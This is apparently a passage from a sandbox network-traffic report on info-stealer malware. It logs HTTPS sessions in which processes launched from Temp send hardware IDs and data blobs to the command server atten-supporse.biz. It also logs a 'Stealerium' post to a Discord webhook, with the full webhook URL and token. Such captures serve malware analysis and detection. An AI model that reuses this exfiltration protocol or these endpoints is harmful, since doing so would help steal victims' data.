2024-12-10 10:11:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49994	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:53 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OIDIPR2CNHCI9JQBK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48650 Host: atten-supporse.biz
2024-12-10 10:11:53 UTC	15331	OUT	Data Raw: 2d 2d 4f 49 44 49 50 52 32 43 4e 48 43 49 39 4a 51 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4f 49 44 49 50 52 32 43 4e 48 43 49 39 4a 51 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 49 44 49 50 52 32 43 4e 48 43 49 39 4a 51 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --OIDIPR2CNHCI9JQBKContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--OIDIPR2CNHCI9JQBKContent-Disposition: form-data; name="pid"1--OIDIPR2CNHCI9JQBKContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-10 10:11:53 UTC	15331	OUT	Data Raw: ce 72 19 00 36 7e 69 bd f6 d0 06 2e ed 47 8f 76 69 7c 05 98 3e 06 31 9f 64 d0 47 07 f1 0b 2b 2f 70 90 aa b9 fe f5 50 d4 c1 47 43 19 a6 b3 07 af 27 75 ff f3 b6 38 3c 82 a4 5f 13 c4 78 ec ba 28 d3 59 19 64 fd 21 ef df 31 d0 e9 f3 c0 a1 ae df cd 3b 5e 9c fb af 6f 63 8c 16 72 09 6a f3 eb bb f1 64 ed 9a ec 68 30 da 61 d5 7c 4b ee 77 1a c3 75 1f b7 9e 61 d9 99 2f 4e 06 db 48 42 db 06 0f a2 a3 89 48 d2 af 1f 96 96 5a e1 ca 59 5a 35 a3 b6 05 8e 43 e4 83 0c 08 1b e6 e8 1b 60 a3 32 02 9d ff 37 63 30 06 2d 1b 63 f4 44 a4 2b db 35 2e 20 01 a2 10 3e 34 c0 d2 ec d8 a1 48 ff fa 57 80 fb 21 b7 37 39 c1 ab 76 15 f5 a5 d4 28 1c 23 08 b3 b0 d4 f7 98 aa 82 cc 9e b1 f1 7f 50 d2 60 5b 22 94 80 2d aa e0 61 74 72 0c f8 26 71 9c 93 d2 3c 8f fc ab 56 8d 7d 25 55 d4 3d 3e bc 2a b7 Data Ascii: r6~i.Gvi\|>1dG+/pPGC'u8<_x(Yd!1;^ocrjdh0a\|Kwua/NHBHZYZ5C`27c0-cD+5. >4HW!79v(#P`["-atr&q<V}%U=>*
2024-12-10 10:11:53 UTC	15331	OUT	Data Raw: 00 78 ad 87 fb 26 3d fa 7b c8 14 71 83 7a c6 90 ed c7 9e 93 d5 a3 6e f0 33 e7 fe a3 fd db 4b ad c0 8c 71 8d ad 65 30 7e 74 48 00 41 4c f6 2d a9 0d 46 45 b6 b5 55 de c1 27 5a 97 bc 9c a6 4e 9b b4 d9 66 92 d6 47 3f bc 54 25 0a 54 9a 19 99 e0 27 c6 6d 4b 47 53 78 15 a7 c5 34 f7 77 5f 01 eb 33 b6 0f f6 71 09 14 ff 4e 32 f5 81 83 51 bc da e8 19 e6 eb 97 f4 37 d3 5c 77 9d 0d ff 39 26 db 7e 36 80 d7 ac 51 61 a0 49 13 79 e3 0b 57 98 63 6f 98 24 e2 61 a1 b4 c9 d8 5a 9d b7 d2 ea 26 cc 14 43 4b 36 59 ad 27 9b 14 6f 63 df ab ba af 58 e8 d9 b6 68 b7 69 cd 16 e7 a6 f4 62 b1 5b 68 46 9c 32 73 04 30 3a 15 55 be 94 a1 7a 14 c8 fd c7 d9 5f 27 bc 23 30 fb ac 7d 38 c3 95 de 6c c4 f3 ca ac 4c a2 e4 32 71 b5 fa 4c 9b 62 c5 1d 98 2e 2a 2f fe 22 6e a4 2c 2f 68 65 0b 56 5f 0c a7 Data Ascii: x&={qzn3Kqe0~tHAL-FEU'ZNfG?T%T'mKGSx4w_3qN2Q7\w9&~6QaIyWco$aZ&CK6Y'ocXhib[hF2s0:Uz_'#0}8lL2qLb.*/"n,/heV_
2024-12-10 10:11:53 UTC	2657	OUT	Data Raw: 15 ba 63 1a 71 24 4f 9c 63 b9 e0 76 53 bd 79 83 29 38 38 ae ad bc 3d 4d 54 60 8a d4 a0 ba 6e 48 5d c6 49 b9 11 47 5c f7 12 4f a1 4b a8 54 c2 6c e0 4e 9f f3 6a 72 a7 e8 58 ed 56 d3 b4 91 65 a1 b5 02 83 38 88 78 bb 97 14 72 ab 01 8a b8 3d ee 40 47 5c 1e 88 74 7a ef a4 55 03 35 49 a6 15 11 a9 06 c4 06 c1 c8 fc 89 78 91 b7 74 50 c8 f0 74 bc e9 08 22 7e da fb 13 8a 2d 45 2e 12 54 cb 47 fd fc b8 85 a7 e5 3a 25 59 45 7b 0f eb fa 08 9e 92 6f a4 5f 9b d0 01 72 0e 7c 38 3e 35 5b 4b b1 ba 82 0e 34 c6 b2 66 63 a4 4f 8f 74 5f a6 95 57 b5 23 3d 4e 3d 0b 16 2e 01 91 83 c6 73 30 52 43 b5 7d 83 0f bb 2f 5a cd 4a a5 8c 60 fb c3 6d 47 5f 17 09 ca 3f 19 56 04 a9 7b 67 6a a6 b7 58 7b c3 a6 72 cf d5 5c de 5e eb bf df 26 93 f7 c8 80 5e f9 00 0c a9 d7 49 d6 9d cd 63 2b 78 bc 8a Data Ascii: cq$OcvSy)88=MT`nH]IG\OKTlNjrXVe8xr=@G\tzU5IxtPt"~-E.TG:%YE{o_r\|8>5[K4fcOt_W#=N=.s0RC}/ZJ`mG_?V{gjX{r\^&^Ic+x
2024-12-10 10:11:57 UTC	1024	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c5ht42a28tn6dl8g46iuc85ugu; expires=Sat, 05-Apr-2025 03:58:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wp%2FqMkuIkaplCdtC5Rdo3YlRLspFa4kMPQ5LVAFHOZ99xHMECYlMn%2Ftii%2FBVMGLxLhWo2ZdCcHTs2wJOnrejErRUAZmbiTov%2FCr1q4UGhAiBk96xzAPaw7pJn9GYG18H%2BoObezU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc74156a3e41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1760&rtt_var=668&sent=24&recv=55&lost=0&retrans=0&sent_bytes=2847&recv_bytes=49701&delivery_rate=1627647&cwnd=205&unsent_bytes=0&cid=9a0944c6092cebc6&ts=3735&x=0"
2024-12-10 10:11:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50004	172.67.196.114	443	6728	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:56 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-12-10 10:11:56 UTC	1007	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:56 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 37630 Last-Modified: Mon, 09 Dec 2024 23:44:46 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O6CzVyZhRShFDrmWdsyJrZbdtrmNFntvOVze7YmPbAxRUSfhEorWVhVlwodrh8nu%2Fz5a4ou%2Fw9mERkU5PgAlc4h%2Fy8AEQyybvk4LvA6sGDOfAdZ%2B4DMf%2BOG2p6esc10wkvUL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8efc74258e464366-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1732&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=726&delivery_rate=1599123&cwnd=200&unsent_bytes=0&cid=611022c02b9ca018&ts=457&x=0"
2024-12-10 10:11:56 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 33 37 38 37 38 38 36 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1733787886}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50007	104.21.32.1	443	5036	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:56 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CMT2QS9I22AA9EWEYC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15083 Host: atten-supporse.biz
2024-12-10 10:11:56 UTC	15083	OUT	Data Raw: 2d 2d 43 4d 54 32 51 53 39 49 32 32 41 41 39 45 57 45 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 43 4d 54 32 51 53 39 49 32 32 41 41 39 45 57 45 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 4d 54 32 51 53 39 49 32 32 41 41 39 45 57 45 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --CMT2QS9I22AA9EWEYCContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--CMT2QS9I22AA9EWEYCContent-Disposition: form-data; name="pid"2--CMT2QS9I22AA9EWEYCContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-10 10:11:58 UTC	1016	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1f09obpj7ptnc190scr6pjijhq; expires=Sat, 05-Apr-2025 03:58:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9fts9UdNh0F69H9JWA4hb79Ld1J59NAbCREDtyBNVuhw4Ejv3%2Bbnzg2XbSlOR5f7ihhhpLrC6XjR4NPmwRel7eVoxXNAdTa7EQ2KVrOeOIysBo2S4duvUf5gn39Sck2vaLhP0g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc7427ff4b334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1909&rtt_var=721&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16025&delivery_rate=1512953&cwnd=173&unsent_bytes=0&cid=22868f64185bf213&ts=1424&x=0"
2024-12-10 10:11:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50027	162.159.128.233	443	6728	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:12:02 UTC	266	OUT	POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: discord.com Content-Length: 2226 Expect: 100-continue Connection: Keep-Alive
2024-12-10 10:12:03 UTC	2226	OUT	Data Raw: 75 73 65 72 6e 61 6d 65 3d 53 74 65 61 6c 65 72 69 75 6d 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 25 32 66 34 35 38 35 37 35 39 30 25 32 66 31 33 38 35 36 38 37 34 36 2d 31 61 35 35 37 38 66 65 2d 66 35 31 62 2d 34 31 31 34 2d 62 63 66 32 2d 65 33 37 34 35 33 35 66 38 34 38 38 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 25 37 62 25 30 64 25 30 61 2b 2b 25 32 32 44 65 66 61 75 6c 74 25 32 32 25 33 61 2b 25 37 62 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 44 61 74 65 25 32 32 25 33 61 2b 25 32 32 32 30 32 34 2d 31 32 2d 31 30 2b 35 25 33 61 31 31 25 33 61 32 37 2b 61 6d 25 32 32 25 32 63 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 53 79 Data Ascii: username=Stealerium&avatar_url=https%3a%2f%2fuser-images.githubusercontent.com%2f45857590%2f138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.png&content=%7b%0d%0a++%22Default%22%3a+%7b%0d%0a++++%22Date%22%3a+%222024-12-10+5%3a11%3a27+am%22%2c%0d%0a++++%22Sy
2024-12-10 10:12:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-10 10:12:03 UTC	1308	IN	HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 10:12:03 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1733825524 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNg1o74%2BkqUOB84B4h8XfgTKohFJD0AlxIXUlaQlk%2F%2FruYdOWZhMIoHY12D6ZqKUVEZyPKJmyRv%2F2JG%2FzoUC5tIppKzwzM%2FWbbBxxZ40c%2BmGMTtbzQXjZSOMYie8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=59f527526709dc59fe053bcdcdee0892135d5087-1733825523; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=aFwCpN3tiXI0c43fGnPVz7baTzHcO1r8iGZIdQldmQw-1733825523255-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8efc744e5f495e78-EWR {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50028	104.21.32.1	443	5036	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:12:03 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TCQ9G2D00 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20519 Host: atten-supporse.biz
2024-12-10 10:12:03 UTC	15331	OUT	Data Raw: 2d 2d 54 43 51 39 47 32 44 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 43 51 39 47 32 44 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 43 51 39 47 32 44 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 54 43 51 39 47 32 44 30 30 0d 0a 43 6f 6e 74 65 6e Data Ascii: --TCQ9G2D00Content-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--TCQ9G2D00Content-Disposition: form-data; name="pid"3--TCQ9G2D00Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--TCQ9G2D00Conten
2024-12-10 10:12:03 UTC	5188	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2024-12-10 10:12:04 UTC	1017	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c4khomsrkh6833tr91q1bqmvf6; expires=Sat, 05-Apr-2025 03:58:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qteAvLuUx967dtjMIMzZewHFy4XGrMut6QPdGobrvjcmconjr5loDlWFGsSUmta6sSFHwEMPTSEUxq%2B31zxyJ6KOM2qJaGEWL7AQ6%2FeJhhhuI3yAycciUQMgsgAV0aZ3nLPR7E8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc74510d9c41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1681&rtt_var=642&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21474&delivery_rate=1688837&cwnd=205&unsent_bytes=0&cid=956db535b10322f8&ts=933&x=0"
2024-12-10 10:12:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:12:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	50093	104.21.32.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:12:20 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-10 10:12:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-10 10:12:21 UTC	1012	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fncai5mtj09sn9r7iphhf68rke; expires=Sat, 05-Apr-2025 03:58:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1rj2hC6GGIOka5PJeY0BM8Qp5iPqdansDHG7762wWX5ntLpSmRU75Pmcx7zVP6VYY%2BxGo5b3aNGBtSWfGL14xFTRozwMfuR79EtyXbrOwTn4jtmhE05DzW22qdynqDSZpjcSSA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc74bace2f0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1620&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1768625&cwnd=218&unsent_bytes=0&cid=af276611a7e977b3&ts=1190&x=0"
2024-12-10 10:12:21 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 10:12:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	50095	104.21.32.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:12:27 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-10 10:12:27 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-10 10:12:28 UTC	1020	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cn3ki91pu1plj830i8bmp12era; expires=Sat, 05-Apr-2025 03:59:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PuoQIcLAyGx5ecsMFdeU5RQVdVqU1nZfHDwqEkYBCdiJzK4cWrTQtp9lxlAxM3nBMAB0BDzkCJg%2Bmd%2B9ee0M8jH2EimHEaHwcOUnjBdLkZqYlpoiuKUNbv%2FkJhN%2B2YCJVCgI%2Fb0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc74e8dcbf435b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1562&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1826141&cwnd=214&unsent_bytes=0&cid=36f3a23f9c67daf4&ts=1323&x=0"
2024-12-10 10:12:28 UTC	349	IN	Data Raw: 31 64 32 62 0d 0a 52 54 56 6b 68 79 59 4f 6a 61 53 6c 51 6d 71 7a 77 34 7a 65 50 7a 73 69 75 69 43 6c 6a 45 46 49 4e 70 72 39 5a 68 48 6b 75 30 51 2b 46 78 4b 6c 48 44 71 68 68 74 59 6e 53 49 6d 33 2f 71 74 61 46 77 44 62 52 49 65 32 4a 79 6c 61 36 5a 68 4b 4d 35 4c 57 5a 6e 39 54 42 65 74 56 61 36 47 47 77 44 70 49 69 5a 6a 33 2f 46 70 56 41 49 41 43 77 4f 59 6a 4b 56 72 34 6e 41 31 2b 6c 4e 63 6e 4c 56 6b 44 37 30 4e 74 36 63 58 4a 4c 77 2f 57 70 75 32 30 55 56 4a 50 30 6b 32 48 6f 47 4d 74 54 4c 6a 48 52 46 79 42 7a 79 55 49 56 42 66 73 42 48 4f 68 33 34 63 6e 42 4a 48 35 72 72 39 61 57 55 37 63 52 4d 37 6b 4b 53 42 53 2b 5a 6b 4d 59 59 33 64 4c 43 31 58 41 4f 35 4a 5a 50 33 49 77 79 67 45 30 4b 7a 74 2f 42 4d 5a 52 38 41 43 6e 36 35 77 47 46 66 70 6a Data Ascii: 1d2bRTVkhyYOjaSlQmqzw4zePzsiuiCljEFINpr9ZhHku0Q+FxKlHDqhhtYnSIm3/qtaFwDbRIe2Jyla6ZhKM5LWZn9TBetVa6GGwDpIiZj3/FpVAIACwOYjKVr4nA1+lNcnLVkD70Nt6cXJLw/Wpu20UVJP0k2HoGMtTLjHRFyBzyUIVBfsBHOh34cnBJH5rr9aWU7cRM7kKSBS+ZkMYY3dLC1XAO5JZP3IwygE0Kzt/BMZR8ACn65wGFfpj
